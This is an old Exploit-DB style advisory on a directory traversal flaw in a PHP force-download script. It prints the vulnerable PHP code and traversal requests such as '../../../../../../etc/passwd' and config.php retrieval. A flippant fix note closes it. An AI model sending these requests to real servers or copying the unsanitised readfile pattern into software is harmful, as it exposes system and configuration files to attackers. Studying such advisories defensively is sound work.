Directory traversal (Unix) Vulnerability

EDB-ID:

13700

CVE:

N/A


Platform:

Unix

Published:

2010-05-13

0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          
             .__       .___.__                       _____      _____  .__  .__         .__     
  __________ |  |    __| _/|__| ___________    _____/ ____\    /  _  \ |  | |  | _____  |  |__  
 /  ___/  _ \|  |   / __ | |  |/ __ \_  __ \  /  _ \   __\    /  /_\  \|  | |  | \__  \ |  |  \ 
 \___ (  <_> )  |__/ /_/ | |  \  ___/|  | \/ (  <_> )  |     /    |    \  |_|  |__/ __ \|   Y  \
/____  >____/|____/\____ | |__|\___  >__|     \____/|__|    /\____|__  /____/____(____  /___|  /
     \/                 \/         \/                       \/       \/               \/     \/ 
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
[o] Directory traversal (Unix) Vulnerability
*************************************************************************
[=========================================================================================================]
|                                         -== A U T H O R ==-                                             |
[=========================================================================================================]
  [+] Author    : Neo|g4br1eL
  [+] Contact   : gabriel_666[at]rocketmail[dot]com
  [+] Team      : Soldier.of.Allah
  [+] Site      : http://neogabriel.soldiersofallah.org/ 
                  http://systems-gabriel.isgreat.org/
[=========================================================================================================]
|                                     -== D E S C R I P T I O N ==-                                       |
[=========================================================================================================]
 Directory Traversal is a vulnerability which allows attackers to access restricted directories           
 and execute commands outside of the web server's root directory. This vulnerability is like Local File  
 Inclussion and we can found it on Remote File Disclosure tecnique                       
 (affects /force-download.php)
 ------------------------------------------------------------->>                                  
 By exploiting directory traversal vulnerabilities, attackers step out of the root directory and access
 files in other directories.As a result, attackers might view restricted files or execute commands, 
 leading to a full compromise of the Web server. 
[=========================================================================================================]
|                                 -==  P r o o f  O f  C o n c e p t  ==-                                 |
[=========================================================================================================]
 As we knows, Remote File Disclosure has vulnerability on force-download.php
 --------------------------------------------
 <?php
    header("Content-type: application/force-download");
    header("Content-disposition: attachment; filename=".$_GET['gabriel']);
    echo file_get_contents($_GET['gabriel']);
 ?>
 --------------------------------------------
 and be able to >>
 Request: http://127.0.0.1/force-download.php?gabriel=[files]
      http://127.0.0.1/force-download.php?gabriel=index.php
      http://127.0.0.1/force-download.php?gabriel=config.php
 --------------------------------------------
 <?php   $file = $_SERVER["DOCUMENT_ROOT"]. $_REQUEST['gabriel'];
     header("Pragma: public");
     header("Expires: 0");
     header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
     header("Content-Type: application/force-download");
     header( "Content-Disposition: attachment; filename=".basename($file));
    //header( "Content-Description: File Transfer");
         @readfile($file);
      exit(0);
 ?>
 --------------------------------------------
 Request: http://127.0.0.1/force-download.php?gabriel=../../../../../../etc/passwd
 --------------------------------------------
          w00ps!! we can succesfully read the "etc/passwd" file. See the source code on
      $_REQUEST['gabriel']; and @readfile($file); for that's command, we can see 
      the content of an arbitrary file ^_^ (such as on Local File Inclussion vulnerability).
[=========================================================================================================]
|                                    -==  H o w   t o   F i x  ==-                                        |
[=========================================================================================================]
  You have to don't allow special characters in variables 
  and don't be able to direct download . . .
  or close your site's before got pawned! LoL :D
[=========================================================================================================]
|                                          -== N o t e 's ==-                                             |
[=========================================================================================================]
 Special Thanks    => Kalashnikov, g0nzhack, kamtiez, vyc0d, Fribo, Ichito Bandito, DeXteR, Don Tukulesto, 
           eLV1N4, Yadoy666, CS-31, PhiLe, r1pp3r_m4y4, Remick, Triple Zix, My22n, Setan_Muda, 
           xyberbreaker, V4mp, Zee Eichel, cr4wl3r, MyWisdom, z0mb1e, dhika81, and all who care to me :) 
 More Big Thanks to => Solder.of.Allah, Indonesiancoder, Indonesianhacker, Yogyacarderlink, Tecon-crew, 
           Undercyber, MC_Crew, Server.is.Down, Devilzc0de, ../../../etc (LoL)
[=========================================================================================================]
|                                            -== F I N ==-                                                |
[=========================================================================================================]